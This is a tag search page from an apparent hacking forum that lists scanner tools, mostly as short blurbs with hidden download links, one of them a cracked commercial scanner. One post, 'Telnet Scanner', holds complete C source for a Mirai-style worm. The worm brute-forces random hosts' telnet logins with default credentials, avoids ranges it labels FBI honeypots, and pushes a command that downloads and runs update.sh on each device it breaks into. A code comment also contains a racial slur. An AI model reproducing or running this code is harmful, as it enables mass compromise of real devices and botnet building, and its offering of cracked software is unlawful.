Search the Community

Showing results for tags 'scanner'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
    • Cracking Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Premium Accounts
    • Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Cracking Zone PRIV8
    • Cracking Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Interests


Occupation


TeamViewer


Tox

Found 24 results

  1. sQuoII

    Scanner SQL by CoLoMoN

    Original Version / Clean 😃 [HIDE][Hidden Content]] Pass: level23hacktools.com
  2. Vulnerability Scanner – Audit Your Web Security with Acunetix Multi-threaded, lightning fast crawler and scanner that can crawl hundreds of thousands of pages without interruptions. Detects over 4500 web application vulnerabilities. Scans open-source software and custom-built applications. Detects critical vulnerabilities with 100% accuracy. Info: [Hidden Content] Links removed Pass: level23hacktools.com This new build reports sites that do not implement Content Security Policy (CSP) or Subresource Integrity (SRI) and detects Node.js source disclosure, Ghostscript RCE, SSRF in Paperclip and other vulnerabilities. This new build has a good number of updates and some important fixes. Below is a full list of updates. New Vulnerability Checks New check for Content Security Policy (CSP) not implemented New check for Subresource Integrity (SRI not implemented New check for Node.js web application source code disclosure New check for Ghostscript RCE via file upload New check for Paperclip Server-Side Request Forgery (SSRF) via file upload (CVE-2017–0889) New check for WPEngine _wpeprivate/config.json information disclosure New check for Cross-site Scripting in HTTP-01 ACME challenge implementation New check for npm log file disclosure New check for PHP-CS-Fixer cache file disclosure Multiple new WordPress and Joomla vulnerability checks. Updates License keys can now be updated via the Acunetix web UI Additional memory improvements Improved exclusion of parameters Multiple updates to existing vulnerability checks Improved CORS origin validation failure checks Improved Pickle Serialization check. Fixes Manual Intervention was not working after a paused scan is resumed Scans for some sites using Digest HTTP Authentication were stopping unexpectedly Additional fixes for issues causing scans exiting unexpectedly Fixed issue causing many product update requests when proxy authentication is incorrectly configured Fixed: Some backup files / folders were not being identified Fixed: Some vulnerabilities were incorrectly reported in the site root Fixed issue in similar page detection causing scans to take longer than expected Fixed issue causing valid sessions not to be identified correctly during the scan.
  3. sQuoII

    SQLi Scanner v1.0

    [Hidden Content]
  4. sQuoII

    Dork Scanner

    Dork Scanner Scans a URL against a list of dorks to check for vulnerabilities. [HIDE][Hidden Content]]
  5. GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap. Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements. GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong. [HIDE][Hidden Content]]
  6. SQLi Google Dork Scanner by ViraX @ 2018 - 2019 for Python 2.7 - compatible Android(NoRoot) - Termux A simple 'naive' python tool to find SQLi Vulnerable websites in the wild via Google. [!] DISCLAIMER: I am not responsible for illegal acts that you would do with this program !, only educational . [!] SQL Dork Scanner SQL Dumper module (basic) Simple Tools Video: [Hidden Content] [HIDE][Hidden Content]]
  7. [HIDE][Hidden Content]] Introduction JoomScan, OWASP Vulnerability Scanner, is an open source project developed in perl which detects Joomla CMS vulnerabilities and analyses them. This tool enables seamless and effortless scanning of Joomla installations, and has a modular and lightweight architecture, so it doesn’t leave to much footprints. JoomScan: If you want to perform penetration testing on a Joomla CMS, then you should try out OWASP JoomScan, since it’s faster then ever with regular updates on Joomla vulnerabilities. Beside ability to detect known offensive vulnerabilities, JoomScan can also detect many misconfigurations and admin-level shortcomings which can lead to the system compromise. Furthermore, OWASP JoomScan provides a friendly UI and compiles the final reports in both text and HTML formats. Features: Version enumerator Vulnerability enumerator (based on version) Components enumerator (1209 most popular by default) Components vulnerability enumerator (based on version)(+1030 exploit) Firewall detector Reporting to Text & HTML output Finding common log files Finding common backup files
  8. Vooki is a free web application vulnerability scanner. Vooki is a user-friendly tool that you can easily scan any web application and find the vulnerabilities. Vooki includes Web Application Scanner, Rest API Scanner, and reporting section Vooki – Web Application Scanner can help you to find the following attacks Sql Injection Command Injection Header Injection Cross site scripting – reflected, Cross site scripting – stored Cross site scripting – dom based Missing security headers Malicious JS script execution Using components with known vulnerabilities Jquery Vulnerabilites Angularjs Vulnerabilites Bootstrap Vulnerabilities Sensitive Information disclosure in response headers Sensitive Information disclosure in error messages Missing Server Side Validation Javascript Dyanamic Code Execution Sensitive Data Exposure [HIDE][Hidden Content]]
  9. Version 2.0 Fixed colors bug Fixed permissions bug Added new option to scan single target Added new option to scan joomla & wordpress plugins [HIDE][Hidden Content]]
  10. Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features : [HIDE][Hidden Content]] Frontend framework detection Content Delivery Network detection Define Risk Level to allow for scans Plugin system Docker image available to build and run Features Fingerprints Server Web Frameworks (CakePHP,CherryPy,...) Frontend Frameworks (AngularJS,MeteorJS,VueJS,...) Web Application Firewall (Waf) Content Management System (CMS) Operating System (Linux,Unix,..) Language (PHP,Ruby,...) Cookie Security Content Delivery Networks (CDN) Attacks: Bruteforce Admin Interface Common Backdoors Common Backup Directory Common Backup File Common Directory Common File Log File Injection HTML Injection SQL Injection LDAP Injection XPath Injection Cross Site Scripting (XSS) Remote File Inclusion (RFI) PHP Code Injection Other HTTP Allow Methods HTML Object Multiple Index Robots Paths Web Dav Cross Site Tracing (XST) PHPINFO .Listing Vulnerabilities ShellShock Anonymous Cipher (CVE-2007-1858) Crime (SPDY) (CVE-2012-4929) Struts-Shock
  11. Taipan is a an automated web application scanner that allows to identify web vulnerabilities in an automatic fashion. This project is the core engine of a broader project which includes other components, like a web dashboard where you can manage your scans, download a PDF report and a scanner agent to run on specific host. Below are some screenshots of the Taipan dashboard: [HIDE][Hidden Content]] Below an example of execution: [Hidden Content] Taipan Components Taipan is composed of four main components: Web Application fingerprinter it inspects the given application in order to identify if it is a COTS application. If so, it extracts the identified version. This components is very important since it allows to identify vulnerable web applications. Hidden Resource Discovery this component scans the application in order to identify resources that are not directly navigable or that shouldn't be accessed, like secret pages or test pages. Crawler This component navigates the web site in order to provide to the other components a list of pages to analyze. It allows to mutate the request in order to find not so common pathes. Vulnerability Scanner this component probes the web application and tries to identify possible vulnerabilities. It is composed of various AddOn in order to easily expand its Knowledge Base. It is also in charge for the identification of know vulnerabilities which are defined by the user.
  12. sQuoII

    ATSCAN V 15.0.0 - SCANNER

    Advanced Search / Dork / Mass Exploitation Scanner Description: ● Search engine: Google/Bing/Ask/Yandex/Sogou/Exalead ● Mass Dork Search ● Multiple instant scans. ● Mass Exploitation ● Use proxy. ● Random user agent. ● Random engine. ● Mass Extern commands execution. ● Exploits and issues search. ● XSS / SQLI / LFI / AFD scanner. ● Filter wordpress and Joomla sites. ● Find Admin page. ● Decode / Encode Base64 / MD5 ● Ports scan. ● Collect IPs ● Collect E-mails. ● Auto detect errors. ● Auto detect Cms. ● Post data. ● Auto sequence repeater. ● Validation. ● Post and Get method ● Issues and Exploit search ● Interactive and Normal interface. ● And more... [HIDE][Hidden Content]]
  13. Angry IP Scanner version 3.5.3 denial of service proof of concept exploit. View the full article
  14. Angry IP Scanner version 3.5.3 denial of service proof of concept exploit. View the full article
  15. dEEpEst

    Joomla Security Scanner v1.0

    Download: [hide][Hidden Content]] Password: level23hacktools.com
  16. dEEpEst

    injection D4 XSS Scanner

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  17. WebCruiser - Web Vulnerability Scanner Enterprise Edition V3.5.6 V3.5.6 HTTPS TLS 1.0/1.1/1.2 support and IE11 emulation (.Net Framework 4.5 required). V3.5.5 bug fix: Internal web browser change to IE9 emulation. V3.5.4 new features: Brute force tool optimization for CSRF token. V3.5.3 new features: Optimization for Content-Type: multipart/form-data. V3.5.2 new features: User-Agent/Referer SQL Injection for MySQL, and new test cases added. V3.5.1 new features: Time-Based SQL Injection POC for MySQL. V3.5 new features: SQL Injection for PostgreSQL & SQLite added. V3.4 new features: Scan for Obsolete Backup added. V3.3 new features: Optimization of SQL Injection Engine. V3.2 new features: Scanning Log. V3.1 new features: Scan for LFI( Local File Inclusion), RFI( Remote File Inclusion), Redirect etc. Test report available : here Key Features: * Crawler(Site Directories and Files). * Vulnerability Scanner: SQL Injection, Cross Site Scripting, LFI, RFI, Redirect, Backup etc. * WAVSEP v1.5 SQL Injection & XSS test cases 100% covered. * SQL Injection POC Tool: GET/Post/Cookie Injection POC(Proof of Concept). * SQL Injection for SQLServer, MySQL, Oracle, DB2, Access, PostgreSQL, SQLite. * POC Tool for XSS, LFI, RFI, Redirect etc. * Resend & brute force Tool. * Cookie Tool. Requirement: IE9+, .Net Framework 4.5 Software Disclaimer: * Authorization must be obtained from the web application owner; * This program will try to get each link and post any data when scanning; * Backup the database before scanning so as to avoid disaster. * Using this software at your own risk. Download Cracked Enterprise Version 3.5.6 : [hide][Hidden Content]] or [hide][Hidden Content]] Password : LeVeL23HacKerSTeaM
  18. 0x1

    libssh scanner

    libssh scanner v1.0.2 This is a python based script to identify hosts vulnerable to CVE-2018-10933. Libssh scanner has two modes: passive (banner grabbing) and aggressive (bypass auth) to validate vulnerability's existence. By default, libssh scanner uses passive mode but supply the -a argument and aggressive mode will be used which provides more accurate results. The vulnerability is present on versions of libssh 0.6+ and was remediated by a patch present in libssh 0.7.6 and 0.8.4. For more details: [Hidden Content] Source & Download : [Hidden Content]
  19. dEEpEst

    Telnet Scanner

    #include <stdarg.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <strings.h> #include <string.h> #include <unistd.h> #include <dirent.h> #include <poll.h> #include <netdb.h> #include <time.h> #include <net/if.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/ioctl.h> #include <arpa/inet.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <resolv.h> //amp setting #define MAX_PACKET_SIZE 1024 #define PHI 0x9e3779b9 //telnet scanner stuff #define BUFFER_SIZE 1024 #define CMD_IAC 255 #define CMD_WILL 251 #define CMD_WONT 252 #define CMD_DO 253 #define CMD_DONT 254 #define PAD_RIGHT 1 #define PAD_ZERO 2 #define PRINT_BUF_LEN 12 #define OPT_SGA 3 #define SOCKBUF_SIZE 1024 // Telnet scanner payload, must end with \r\n\0 char *rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget [Hidden Content]; busybox wget [Hidden Content]; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh\r\n\0"; char *usernames[] = { "\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "root\0", "admin\0", "root\0", "default\0", "user\0", "guest\0", "daemon\0", "admin\0", "admin\0", "root\0", "admin\0", "adm\0", "guest\0", "root\0", "root\0", "telnet\0", "root\0", "admin\0", "admin\0", "Administrator\0", "root\0", "mg3500\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "default\0", "admin\0", "admin\0", "admin\0", "root\0", "root\0", "root\0", "root\0", "admin1\0", "ubnt\0", "support\0", "root\0", "user\0", "guest\0" }; char *passwords[] = { "\0", "root\0", "password\0", "\0", "Zte521\0", "vizxv\0", "000000\0", "14567\0", "hi3518\0", "user\0", "pass\0", "admin14\0", "7ujMko0admin\0", "00000000\0", "<>\0", "klv1\0", "klv14\0", "oelinux1\0", "realtek\0", "1111\0", "54321\0", "antslq\0", "zte9x15\0", "system\0", "1456\0", "888888\0", "ikwb\0", "default\0", "juantech\0", "xc3511\0", "support\0", "1111111\0", "service\0", "145\0", "4321\0", "tech\0", "<>\0", "abc1\0", "7ujMko0admin\0", "switch\0", "admin14\0", "\0", "1111\0", "meinsm\0", "pass\0", "smcadmin\0", "14567890\0", "14\0", "admin1\0", "password\0", "admin\0", "anko\0", "xc3511\0", "1456\0", "\0", "guest\0", "145\0", "xc3511\0", "admin\0", "Zte521\0", "\0", "user\0", "guest\0", "\0", "password\0", "admin1\0", "ikwb\0", "14567890\0", "\0", "\0", "1456\0", "root\0", "telnet\0", "zte9x15\0", "meinsm\0", "\0", "\0", "antslq\0", "merlin\0", "switch\0", "7ujMko0admin\0", "abc1\0", "<>\0", "tech\0", "4321\0", "default\0", "145\0", "service\0", "1111111\0", "admin14\0", "pass\0", "user\0", "hi3518\0", "password\0", "ubnt\0", "zlxx.\0", "14567\0", "000000\0" }; char *advances[] = { ":", "ser", "ogin", "name", "pass", "dvrdvs", (char *) 0 }; char *fails[] = { "nvalid", "ailed", "ncorrect", "enied", "error", "goodbye", "bad", "timeout", (char *) 0 }; char *successes[] = { "$", "#", ">", "@", "shell", "dvrdvs", "usybox", (char *) 0 }; char *advances2[] = { ":", "nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char *) 0 }; char *legit[] = { "AK47", (char *) 0 }; char *infected[] = { "CAPSAICIN", (char *) 0 }; int scanPid = 0; struct telstate_t { int fd; unsigned int ip; unsigned char state; unsigned char complete; unsigned char usernameInd; /* username */ unsigned char passwordInd; /* password */ unsigned int totalTimeout; /* totalTimeout */ char *sockbuf; }; struct ipstate_t { int fd; unsigned int ip; unsigned char state; unsigned char complete; unsigned char usernameInd; unsigned char passwordInd; unsigned int totalTimeout; unsigned int telPort; char *sockbuf; }; static uint32_t Q[4096], c = 362436; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1)&4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if(x < c) { x++; c++; } return (Q[i] = r - x); } static void printchar(unsigned char ** str, int c) { if (str) { ** str = c; ++( * str); } else(void) write(1,&c, 1); } static int prints(unsigned char ** out, const unsigned char *string, int width, int pad) { register int pc = 0, padchar = ' '; if (width > 0) { register int len = 0; register const unsigned char *ptr; for (ptr = string;* ptr; ++ptr) ++len; if (len >= width) width = 0; else width -= len; if (pad&PAD_ZERO) padchar = '0'; } if (!(pad&PAD_RIGHT)) { for (; width > 0; --width) { printchar(out, padchar); ++pc; } } for (;* string; ++string) { printchar(out, * string); ++pc; } for (; width > 0; --width) { printchar(out, padchar); ++pc; } return pc; } static int printi(unsigned char ** out, int i, int b, int sg, int width, int pad, int letbase) { unsigned char print_buf[PRINT_BUF_LEN]; register unsigned char *s; register int t, neg = 0, pc = 0; register unsigned int u = i; if (i == 0) { print_buf[0] = '0'; print_buf[1] = '\0'; return prints(out, print_buf, width, pad); } if (sg && b == 10 && i < 0) { neg = 1; u = -i; } s = print_buf + PRINT_BUF_LEN - 1; * s = '\0'; while (u) { t = u % b; if (t >= 10) t += letbase - '0' - 10; *--s = t + '0'; u /= b; } if (neg) { if (width && (pad&PAD_ZERO)) { printchar(out, '-'); ++pc; --width; } else { *--s = '-'; } } return pc + prints(out, s, width, pad); } static int print(unsigned char ** out, const unsigned char *format, va_list args) { register int width, pad; register int pc = 0; unsigned char scr[2]; for (;* format != 0; ++format) { if ( * format == '%') { ++format; width = pad = 0; if ( * format == '\0') break; if ( * format == '%') goto out; if ( * format == '-') { ++format; pad = PAD_RIGHT; } while ( * format == '0') { ++format; pad |= PAD_ZERO; } for (;* format >= '0' && * format <= '9'; ++format) { width *= 10; width += * format - '0'; } if ( * format == 's') { register char *s = (char *) va_arg(args, int); pc += prints(out, s ? s : "(null)", width, pad); continue; } if ( * format == 'd') { pc += printi(out, va_arg(args, int), 10, 1, width, pad, 'a'); continue; } if ( * format == 'x') { pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'a'); continue; } if ( * format == 'X') { pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'A'); continue; } if ( * format == 'u') { pc += printi(out, va_arg(args, int), 10, 0, width, pad, 'a'); continue; } if ( * format == 'c') { scr[0] = (unsigned char) va_arg(args, int); scr[1] = '\0'; pc += prints(out, scr, width, pad); continue; } } else { out: printchar(out, * format); ++pc; } } if (out) ** out = '\0'; va_end(args); return pc; } int szprintf(unsigned char *out, const unsigned char *format, ...) { va_list args; va_start(args, format); return print(&out, format, args); } char *thanks = "thanks to unhappygh0st for the honeypot ip ranges :)"; in_addr_t getDatIP() { uint8_t ipState[4] = { 0 }; ipState[0] = rand() % 255; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; while ( (ipState[0] == 0) || (ipState[0] == 10) || (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) || (ipState[0] == 127) || (ipState[0] == 169 && ipState[1] == 254) || (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) || (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) || (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) || (ipState[0] == 192 && ipState[1] == 168) || (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) || (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) || (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) || (ipState[0] == 62 && ipState[1] <= 30) || //Honeypot (ipState[0] == 207 && ipState[1] >= 31 && ipState[2] <= 120) || //FBI Honeypots (207.31.0.0 - 207.120.255.255) (ipState[0] == 65) && (ipState[1] >= 224) && (ipState[2] <= 226) || // More FBI Honeypots (64.224.0.0 - 64.226.255.255) (ipState[0] == 195) && (ipState[1] == 10) || //Yet another FBI Honeypot. (ipState[0] == 216) && (ipState[1] == 25 || ipState[1] == 94) || //Fucking nigger LOL (FBI Honeypots) (ipState[0] == 212) && (ipState[1] == 56) || //The fuck?! 212.56.107.22 - uhhhhm. FBI Honeypot. (ipState[0] >= 224) && (ipState[0] <= 239) //Multicast ip ranges ) { ipState[0] = rand() % 255; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; } char ip[16] = { 0 }; szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); return inet_addr(ip); } int negotiate(int sock, unsigned char *buf, int len) { unsigned char c; switch (buf[1]) { case CMD_IAC: return 0; case CMD_WILL: case CMD_WONT: case CMD_DO: case CMD_DONT: c = CMD_IAC; send(sock,&c, 1, MSG_NOSIGNAL); if (CMD_WONT == buf[1]) c = CMD_DONT; else if (CMD_DONT == buf[1]) c = CMD_WONT; else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO); else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT); send(sock,&c, 1, MSG_NOSIGNAL); send(sock,&(buf[2]), 1, MSG_NOSIGNAL); break; default: break; } return 0; } int contains_string(char *buffer, char ** strings) { int num_strings = 0, i = 0; for (num_strings = 0; strings[++num_strings] != 0;); for (i = 0; i < num_strings; i++) { if (strcasestr(buffer, strings[i])) { return 1; } } return 0; } int contains_success(char *buffer) { return contains_string(buffer, successes); } int contains_fail(char *buffer) { return contains_string(buffer, fails); } int contains_response(char *buffer) { return contains_success(buffer) || contains_fail(buffer); } int read_with_timeout(int fd, int timeout_usec, char *buffer, int buf_size) { fd_set read_set; struct timeval tv; tv.tv_sec = 0; tv.tv_usec = timeout_usec; FD_ZERO(&read_set); FD_SET(fd,&read_set); if (select(fd + 1,&read_set, NULL, NULL,&tv) < 1) return 0; return recv(fd, buffer, buf_size, 0); } int read_until_response(int fd, int timeout_usec, char *buffer, int buf_size, char ** strings) { int num_bytes, i; memset(buffer, 0, buf_size); num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size); if (&buffer[0] == "\xFF") { negotiate(fd, buffer, 3); } if (contains_string(buffer, strings)) { return 1; } return 0; } const char *get_telstate_host(struct telstate_t * telstate) { // get host struct in_addr in_addr_ip; in_addr_ip.s_addr = telstate->ip; return inet_ntoa(in_addr_ip); } void advance_telstate(struct telstate_t * telstate, int new_state) { // advance if (new_state == 0) { close(telstate->fd); } telstate->totalTimeout = 0; telstate->state = new_state; memset((telstate->sockbuf), 0, SOCKBUF_SIZE); } void reset_telstate(struct telstate_t * telstate) { // reset advance_telstate(telstate, 0); telstate->complete = 1; } int sclose(int fd) { if (3 > fd) return 1; close(fd); return 0; } void ak47telscan(int wait_usec, int maxfds) { int i, res, num_tmps, j; char buf[128], cur_dir; int max = maxfds; fd_set fdset; struct timeval tv; socklen_t lon; int valopt; srand(time(NULL) ^ rand_cmwc()); char line[256]; char *buffer; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); buffer = malloc(BUFFER_SIZE + 1); memset(buffer, 0, BUFFER_SIZE + 1); struct telstate_t fds[max]; memset(fds, 0, max * (sizeof(int) + 1)); for (i = 0; i < max; i++) { memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].complete = 1; fds[i].sockbuf = buffer; } while (1) { for (i = 0; i < max; i++) { if (fds[i].totalTimeout == 0) { fds[i].totalTimeout = time(NULL); } switch (fds[i].state) { case 0: { if (fds[i].complete == 1) { // clear the current fd char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; // get a new random ip fds[i].ip = getDatIP(); } else if (fds[i].complete == 0) { fds[i].passwordInd++; fds[i].usernameInd++; if (fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].complete = 1; continue; } if (fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; } } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); dest_addr.sin_addr.s_addr = fds[i].ip; fds[i].fd = socket(AF_INET, SOCK_STREAM, 0); if (fds[i].fd == -1) continue; fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK); if (connect(fds[i].fd, (struct sockaddr * )&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { reset_telstate(&fds[i]); } else { advance_telstate(&fds[i], 1); } } break; case 1: { printf("[AK-47] FOUND ---> %s:23\n", get_telstate_host(&fds[i])); FD_ZERO(&fdset); FD_SET(fds[i].fd,&fdset); tv.tv_sec = 0; tv.tv_usec = wait_usec; res = select(fds[i].fd + 1, NULL,&fdset, NULL,&tv); if (res == 1) { lon = sizeof(int); valopt = 0; getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void * )(&valopt),&lon); //printf("%d\n",valopt); if (valopt) { reset_telstate(&fds[i]); } else { fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL)&(~O_NONBLOCK)); advance_telstate(&fds[i], 2); } continue; } else if (res == -1) { reset_telstate(&fds[i]); continue; } if (fds[i].totalTimeout + 5 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 2: { if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) { if (contains_fail(fds[i].sockbuf)) { advance_telstate(&fds[i], 0); } else { advance_telstate(&fds[i], 3); } continue; } if (fds[i].totalTimeout + 7 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 3: { if (send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } advance_telstate(&fds[i], 4); } break; case 4: { if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) { if (contains_fail(fds[i].sockbuf)) { advance_telstate(&fds[i], 0); } else { advance_telstate(&fds[i], 5); } continue; } if (fds[i].totalTimeout + 3 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 5: { if (send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } advance_telstate(&fds[i], 6); } break; case 6: { if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) { fds[i].totalTimeout = time(NULL); if (contains_fail(fds[i].sockbuf)) { advance_telstate(&fds[i], 0); } else if (contains_success(fds[i].sockbuf)) { if (fds[i].complete == 2) { advance_telstate(&fds[i], 7); } else { printf("[AK-47] [-] CRACKED ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); char command[1024]; sprintf(command, "echo '%s:23 %s:%s' >> cracked.txt", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); system(command); advance_telstate(&fds[i], 7); } } else { reset_telstate(&fds[i]); } continue; } if (fds[i].totalTimeout + 7 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 7: { fds[i].totalTimeout = time(NULL); if (send(fds[i].fd, "enable\r\n", 8, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if (send(fds[i].fd, "system\r\n", 8, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if (send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if (send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if(send(fds[i].fd, "echo -e '\\x41\\x4b\\x34\\x37'", 26, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, legit)) { if (send(fds[i].fd, rekdevice, strlen(rekdevice), MSG_NOSIGNAL) > 0) { printf("[AK-47] [-] PAYLOAD SENT ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); reset_telstate(&fds[i]); } sleep(20); if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, infected)) { printf("[AK-47] [+] SUCCESSFUL INFECTION ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); reset_telstate(&fds[i]); continue; } if (fds[i].totalTimeout + 60 < time(NULL)) { if (fds[i].complete != 3) { printf("[AK-47] [-] FAILED TO INFECT ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); } reset_telstate(&fds[i]); } } break; } } } } } int main(int argc, char **argv) { uint32_t parent; parent = fork(); int forks = sysconf(_SC_NPROCESSORS_ONLN); int fds = forks * 512; //Far effective. 512 sockets for each CPU. if (parent > 0) { scanPid = parent; return 0; } else if (parent == -1) return 1; int ii; for (ii = 0; ii < forks; ii++) { srand((time(NULL) ^ getpid()) + getppid()); init_rand(time(NULL) ^ getpid()); ak47telscan(370, fds); } return 0; }[/Code]
  20. dEEpEst

    Gr3eNoX Exploit Scanner

    Download: [hide][Hidden Content]] Password: level23hacktools.com
  21. Infiltrator Network Security Scanner version 4.6 denial of service proof of concept exploit. View the full article
  22. @.Root

    Android Network Scanner

